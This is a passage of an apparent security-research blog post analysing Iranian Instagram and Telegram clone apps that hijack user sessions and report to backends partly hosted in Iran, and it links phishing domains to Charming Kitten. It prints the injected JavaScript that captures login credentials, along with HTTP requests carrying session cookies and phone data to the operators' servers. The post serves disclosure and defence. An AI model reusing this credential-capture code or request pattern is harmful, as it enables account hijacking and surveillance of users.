The same operator also manages (see previous section) sites like lik3.org, which sells the same kind of exposure.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-PyBlB7MRIss/W-BcdrtCBjI/AAAAAAAAAQw/we8YCX7ieHgfV7mfhmltt2GwhxdGb9vugCK4BGAYYCw/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="https://3.bp.blogspot.com/-PyBlB7MRIss/W-BcdrtCBjI/AAAAAAAAAQw/we8YCX7ieHgfV7mfhmltt2GwhxdGb9vugCK4BGAYYCw/s640/image5.png" width="640" /></a></div><div style="text-align: center;">Price list (original HTML errors were kept, translation by google.com)</div><br /><div style="text-align: justify;"><div style="text-align: left;">While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing that highlights the benefits of using this service rather than others.</div></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-B7N9nCU_rHM/W-BclIqZoJI/AAAAAAAAAQ4/VdLu5j1Vy-oFWzLyNr0oL-Mm8oHs7ufyQCK4BGAYYCw/s1600/image18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="https://4.bp.blogspot.com/-B7N9nCU_rHM/W-BclIqZoJI/AAAAAAAAAQ4/VdLu5j1Vy-oFWzLyNr0oL-Mm8oHs7ufyQCK4BGAYYCw/s640/image18.png" width="640" /></a></div><br /><div style="text-align: center;">Lik3.org marketing (translation by google.com)</div><br /><div style="text-align: left;">It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. 
The reality is that the operator doesn't need the customer's password, because the "likes" are not performed from the customer's account: any other Instagram account whose session the operator holds can like the customer's post.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Instead, the operator has access to thousands of user sessions, one for every user who installed the "free" applications, and can do whatever they want within those sessions. While the operator uses a different method for the Telegram applications, it can also lead to complete session takeover. See the "Application examples" section for more details.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods used to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these services, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.</div><br /><div style="text-align: left;">Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, it potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.<br /><br /></div><b><span style="font-size: small;">Application examples</span></b><br /><b><br /></b><b>Follower Begir Instagram iOS application</b><br /><div><b><br /></b></div>The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. 
Andromedaa.ir published this application, and it's signed by Cambridge Universal Academy. This application is a wrapper around Instagram's web interface.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gdkAnQxGRAQ/W-BdCww--lI/AAAAAAAAARM/AEK9TyvyDQg_QTEqpUWo7RvvIHW9KD3sQCK4BGAYYCw/s1600/image14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-gdkAnQxGRAQ/W-BdCww--lI/AAAAAAAAARM/AEK9TyvyDQg_QTEqpUWo7RvvIHW9KD3sQCK4BGAYYCw/s640/image14.png" width="328" /></a></div><div style="text-align: center;">First screen after logging in</div><br />The developer added some features such as virtual currency and Persian language support, among others.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-pSgFDiBi1-U/W-BdLC1M3EI/AAAAAAAAARU/2Rtsi_roM9cR7myxfcyIdVzBcXIP42hPgCK4BGAYYCw/s1600/image21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://3.bp.blogspot.com/-pSgFDiBi1-U/W-BdLC1M3EI/AAAAAAAAARU/2Rtsi_roM9cR7myxfcyIdVzBcXIP42hPgCK4BGAYYCw/s400/image21.png" width="370" /></a></div><div style="text-align: center;">Certificate information</div><br />The application uses the iOS WebKit framework in order to display web content, which in this case is the Instagram page. 
Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.<br /><br /><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">document.addEventListener('click', function() {</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; try {</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tu = document.querySelector('[name="username"]');</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tp = document.querySelector('[name="password"]');</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tpV = (typeof tp == 'undefined') ? '' : tp.value;</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tuV = (typeof tu == 'undefined') ? 
'' : tu.value;</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; } catch (err) {</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tuV = '';</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tpV = ''</span><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; }</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; var bd = document.getElementsByTagName('body')[0].innerText;</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; var messageToPost = {</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; 'pu': tuV,</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; 'pp': tpV,</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; 'bd': bd</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; }; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);</span><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">}, false);</span></blockquote><br /><br /><div style="text-align: left;">The purpose of this code is to give the control to 
the iOS application when the user clicks the "Connection" button. The application receives an event, and the value of the username and password fields, along with the body of the page. The event is handled by the <span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">followerbegir.AuthorizationUserController userController:didReceiveScriptMessage()</span> function. Afterward, the application authenticates on Instagram servers.</div><br />During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:<br /><br /><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">POST /users/ping.php?m=ios&amp;access=<i>[redacted]</i>&amp;apk=35&amp;imei=<i>[redacted]</i>&amp;user_details=<i>[redacted]</i>&amp;tokenNumber=<i>[redacted]</i> HTTP/1.1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Host: v1.flbgr.com</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">SESSIONID: <i>[redacted]</i></span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">HEADER: vf1</span><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">IOS: 3361ba9ec3480bcd3766e07cf6b4068a</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Connection: close</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept: */*</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept-Language: 
fr-fr</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept-Encoding: gzip, deflate</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Content-Length: 0</span></blockquote><br />The operator of the backend server receives the mobile platform (iOS), a token and user data such as the username, profile picture, full name and whether the account is private.<br /><div style="text-align: left;"><br /></div><div style="text-align: left;">The SESSIONID header carries the most sensitive information: the cookie header of an authenticated Instagram connection. Whoever controls the server can hijack the user's Instagram session with the information in this field.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. 
When the application starts, it sends a request to ndrm[.]ir with the current version of the app:<br /><br /><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">POST /start/fl.php?apk=35&amp;m=ios HTTP/1.1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Host: ndrm.ir</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">HEADER: vf1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Connection: close</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">IOS: 3361ba9ec3480bcd3766e07cf6b4068a</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept: */*</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept-Language: en-gb</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept-Encoding: gzip, deflate</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Content-Length: 0</span></blockquote><br />If the version is not up to date, the application redirects the user to the andromedaa store:<br /><br /></div><div class="separator" 
style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ma21Hoyfk1A/W-BefyioVuI/AAAAAAAAARk/0jQtnwDPEEEAVgA-HX7FCBQirT9i5a-ZACK4BGAYYCw/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://2.bp.blogspot.com/-ma21Hoyfk1A/W-BefyioVuI/AAAAAAAAARk/0jQtnwDPEEEAVgA-HX7FCBQirT9i5a-ZACK4BGAYYCw/s640/image6.png" width="300" /></a></div><div style="text-align: center;">Instructions to trust the developer certificate</div><br />The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.<br /><br /><b> Ozvbegir(ozvdarozv) application</b><br /><br />The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cfiPaDxUIfs/W-BfdWjEbMI/AAAAAAAAARw/m-yLMszep5kewpOGtHD_iB7YXYOigxW4gCK4BGAYYCw/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://4.bp.blogspot.com/-cfiPaDxUIfs/W-BfdWjEbMI/AAAAAAAAARw/m-yLMszep5kewpOGtHD_iB7YXYOigxW4gCK4BGAYYCw/s400/image3.png" width="400" /></a></div><div style="text-align: center;">Application description (translation by Google Translate)</div><br />We analyzed the Android version of the application. 
The application package is signed by a self-signed certificate that's valid until the year 3014.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-186PMeCn5_0/W-BfnkD-AkI/AAAAAAAAAR4/1bMzy3iZtGAPzFkq3Lh4tvny8C7nER9mQCK4BGAYYCw/s1600/image20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="303" src="https://3.bp.blogspot.com/-186PMeCn5_0/W-BfnkD-AkI/AAAAAAAAAR4/1bMzy3iZtGAPzFkq3Lh4tvny8C7nER9mQCK4BGAYYCw/s400/image20.png" width="400" /></a></div><div style="text-align: center;">Most recent Ozvbegir certificate</div><br />Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information were clearly false.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-81ORxb1e4rc/W-Bf5Pi1xOI/AAAAAAAAASI/HoPeXcCaatAQmlha1W0v3HoeVFBXHvdiQCK4BGAYYCw/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://4.bp.blogspot.com/-81ORxb1e4rc/W-Bf5Pi1xOI/AAAAAAAAASI/HoPeXcCaatAQmlha1W0v3HoeVFBXHvdiQCK4BGAYYCw/s400/image4.png" width="400" /></a></div><div style="text-align: center;">Older version's certificate</div><br />The Ozvbegir application is a repackaged build that includes original classes from the Telegram application.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-n3wwYXZVSog/W-Bf8NwvENI/AAAAAAAAASQ/Rt6mtE3jQrYq1bqrje-5gKDmLGrsIznkwCK4BGAYYCw/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://2.bp.blogspot.com/-n3wwYXZVSog/W-Bf8NwvENI/AAAAAAAAASQ/Rt6mtE3jQrYq1bqrje-5gKDmLGrsIznkwCK4BGAYYCw/s400/image11.png" width="332" /></a></div><div style="text-align: center;">Ozvbegir classes structure</div><br />In fact, we found signs in the manifest 
that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used in the manifest have several references to the original Telegram application, and even the API key used for the Android Maps app was kept the same.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-K2rLq1OLdeM/W-Bhdgyvt5I/AAAAAAAAASg/SxaCjDQkHMc4pz4hhABfagzn-GTmFpXcwCK4BGAYYCw/s1600/image24.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://4.bp.blogspot.com/-K2rLq1OLdeM/W-Bhdgyvt5I/AAAAAAAAASg/SxaCjDQkHMc4pz4hhABfagzn-GTmFpXcwCK4BGAYYCw/s640/image24.jpg" width="640" /></a></div><div style="text-align: center;"><br />Update check and reply</div><br />Just like the previous application, this one also checks for new versions by performing an HTTP request to the ndrm.ir domain. If the application is not the latest version, it receives both a message and a link to obtain the most recent version, which can be anything the operator wants. In this case, it's from cafebazaar.ir, an Iranian Android application store.<br /><br />The domain ndrm.ir is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran, and coincidentally it is the one with the ability to upgrade the application on mobile devices.<br /><br />The application has a look and feel that strongly resembles the original Telegram application. 
Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lGYgYTbf5zw/W-BhhbZ7C4I/AAAAAAAAASo/Hyu_qNC_bn8wn2X6puDJhLecAqZM6JpcQCK4BGAYYCw/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://3.bp.blogspot.com/-lGYgYTbf5zw/W-BhhbZ7C4I/AAAAAAAAASo/Hyu_qNC_bn8wn2X6puDJhLecAqZM6JpcQCK4BGAYYCw/s640/image2.png" width="360" /></a></div><div style="text-align: center;">Phone number request</div><br />This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4njvHgs10kA/W-BhlDB8d4I/AAAAAAAAASw/2rPKBfRg4e44QsV2tGiQgUlz8Qg-FIZtACK4BGAYYCw/s1600/image13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://3.bp.blogspot.com/-4njvHgs10kA/W-BhlDB8d4I/AAAAAAAAASw/2rPKBfRg4e44QsV2tGiQgUlz8Qg-FIZtACK4BGAYYCw/s640/image13.png" width="329" /></a></div><div style="text-align: center;">Sessions created on a single phone</div><br />The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.<br /><br /><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">GET 
/users/ping.php?access_hash=<i>[redacted]</i>&amp;inactive=0&amp;flags=1107&amp;last_name=%21%21empty%21%21&amp;phone=<i>[redacted]</i>&amp;tg_id=<i>[redacted]</i>&amp;m=d&amp;user_name=<i>[redacted]</i>&amp;first_name=Pr2&amp;network=SYMA&amp;country=<i>[redacted]</i>&amp;apk=570&amp;imei=<i>[redacted]</i>&amp;brand=motorola&amp;api=24&amp;version=7.0&amp;model=Moto+G+%285%29&amp;tut=[redacted] HTTP/1.1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">NUM: df27340104277f1e73142224d9cb59e8</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">HEADER: bt6</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">ADMIN: web</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Host: v1.ozvdarozv.com</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Connection: close</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">User-Agent: Apache-HttpClient/4.5.1 (java 1.4)</span></blockquote><div><br /></div><br />We identified more than 1 million subscribers on the Telegram channel who automatically joined when they first opened the application.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-tfgxSDCO1yU/W-Bh1taHUgI/AAAAAAAAATE/pX9_6Ekl4o4Hut86ixxbxTsR6pRH3yN9gCK4BGAYYCw/s1600/image15.png" imageanchor="1" style="margin-left: 1em; 
margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-tfgxSDCO1yU/W-Bh1taHUgI/AAAAAAAAATE/pX9_6Ekl4o4Hut86ixxbxTsR6pRH3yN9gCK4BGAYYCw/s640/image15.png" width="360" /></a></div><div style="text-align: center;">Channel information</div><br /><b><br /></b> <b>Bitgram_dev</b><br /><br />Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wJlJmmfIfvg/W-Bh6CrPJnI/AAAAAAAAATM/eIO5hw8-_q8MQhrmn2pbUekB4daSzUzXgCK4BGAYYCw/s1600/image19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="https://2.bp.blogspot.com/-wJlJmmfIfvg/W-Bh6CrPJnI/AAAAAAAAATM/eIO5hw8-_q8MQhrmn2pbUekB4daSzUzXgCK4BGAYYCw/s400/image19.png" width="400" /></a></div><div style="text-align: center;">AseGram and BitGram on Google Play</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-oQj1RqmThDw/W-BiCzL54RI/AAAAAAAAATU/iJUFB6MHIqoup2CsqNxA9E2NI99GNBHFgCK4BGAYYCw/s1600/image23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://3.bp.blogspot.com/-oQj1RqmThDw/W-BiCzL54RI/AAAAAAAAATU/iJUFB6MHIqoup2CsqNxA9E2NI99GNBHFgCK4BGAYYCw/s400/image23.png" width="400" /></a></div><div style="text-align: center;">Publisher information</div><br />Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.<br /><br /><h3>Application examples</h3><div><br /></div><b><br /></b> <b> AseGram</b><br /><b><br /></b> <b><br /></b><br />The AseGram 
application is available on the Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-pDWuJM0nAGI/W-BiIBiB6eI/AAAAAAAAATg/L_cfiSvNaqokCbOAJTmLlDlj672AjvguQCK4BGAYYCw/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-pDWuJM0nAGI/W-BiIBiB6eI/AAAAAAAAATg/L_cfiSvNaqokCbOAJTmLlDlj672AjvguQCK4BGAYYCw/s640/image8.png" width="611" /></a></div><div style="text-align: center;">AseGram certificate</div><br /><div style="text-align: left;">This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: This software uses a proxy defined at the Telegram package layer in order to intercept traffic.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ZO0nGP6-8Lo/W-BiR1gWQuI/AAAAAAAAAT0/LYTsLgJIQcsHvGw75seSduY6e70lPaxbgCK4BGAYYCw/s1600/image12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://4.bp.blogspot.com/-ZO0nGP6-8Lo/W-BiR1gWQuI/AAAAAAAAAT0/LYTsLgJIQcsHvGw75seSduY6e70lPaxbgCK4BGAYYCw/s640/image12.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;">Set proxy code</div><br /><br />Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.<br /><br /><div style="text-align: left;">The service <span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">org.pouyadr.Service.MyService</span> starts upon boot. 
This calls <span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">MessagesController.getGlobalMainSettings()</span> from the original Telegram package and changes the settings to include the proxy configuration.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The application contacts three domains: talagram.ir, hotgram.ir and harsobh.com, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications.&nbsp;</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This application creates a service that can't be disabled just by closing the application and starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, this uses the back end of the Telegram clone called "Advanced Telegram" (or "Golden Telegram"). 
This application is available at cafebazaar.ir, an Iranian state-sanctioned Android application store.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FSJiVisVaMM/W-BiVcdCMJI/AAAAAAAAAUA/m1sBTrpcN88oF_EAwXJU0VwHVIKoR92mwCK4BGAYYCw/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="https://2.bp.blogspot.com/-FSJiVisVaMM/W-BiVcdCMJI/AAAAAAAAAUA/m1sBTrpcN88oF_EAwXJU0VwHVIKoR92mwCK4BGAYYCw/s640/image1.png" width="640" /></a></div><div style="text-align: center;"><br />Advanced Telegram cafebazaar page (translation by Google translate)</div><br /><div style="text-align: left;">It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find a legitimate use case where an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The application also contains code to use SOCKS servers located in several countries, which can be used to circumvent the ban. However, during our research we have never seen these being used. On the other hand, if the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.</div><h3 id="h.8gnz0y34l4u2">Fake websites</h3><h4>Spoofed Telegram Websites</h4><div style="text-align: left;">The most straightforward approach to gain access to an end user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. 
We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-P4OoOGIiVaY/W-BiYi-JQSI/AAAAAAAAAUM/vMby91NWl6MEMGrybbUTJbPoVjWZtYJbACK4BGAYYCw/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://2.bp.blogspot.com/-P4OoOGIiVaY/W-BiYi-JQSI/AAAAAAAAAUM/vMby91NWl6MEMGrybbUTJbPoVjWZtYJbACK4BGAYYCw/s400/image9.png" width="400" /></a></div><div style="text-align: center;">Fake Telegram login page</div><br /><div style="text-align: left;">This domain was registered on July 25, 2017. The tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address — nami.rosoki@gmail[.]com — used to register this domain as well as other domains, and the domain's passive DNS (pDNS) records all suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by <a href="https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf">another cybersecurity firm</a>, Clearsky. 
Upon further inspection of the web page source code, it appears as though the website was built using the <a href="https://github.com/zhukov/webogram">GitHub project called "Webogram"</a>; there were also strings in the page source suggesting that this website's display was designed for iPhones.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-V8pr5vZpJ28/W-BibiW4UnI/AAAAAAAAAUY/jiAKFah6GEkIWX6hkE78A8CyIzdjp6XSwCK4BGAYYCw/s1600/image17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://1.bp.blogspot.com/-V8pr5vZpJ28/W-BibiW4UnI/AAAAAAAAAUY/jiAKFah6GEkIWX6hkE78A8CyIzdjp6XSwCK4BGAYYCw/s640/image17.png" width="640" /></a></div><div style="text-align: center;">Source code, GitHub.com reference<br /><br /></div><h4>Newly identified Charming Kitten domains</h4><div><br /></div>While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had a continued interest in gaining access to end users' mobile devices and specifically their chat messages.<br />These domains were also registered using the same modus operandi as all the other domains associated with this group in 2017. 
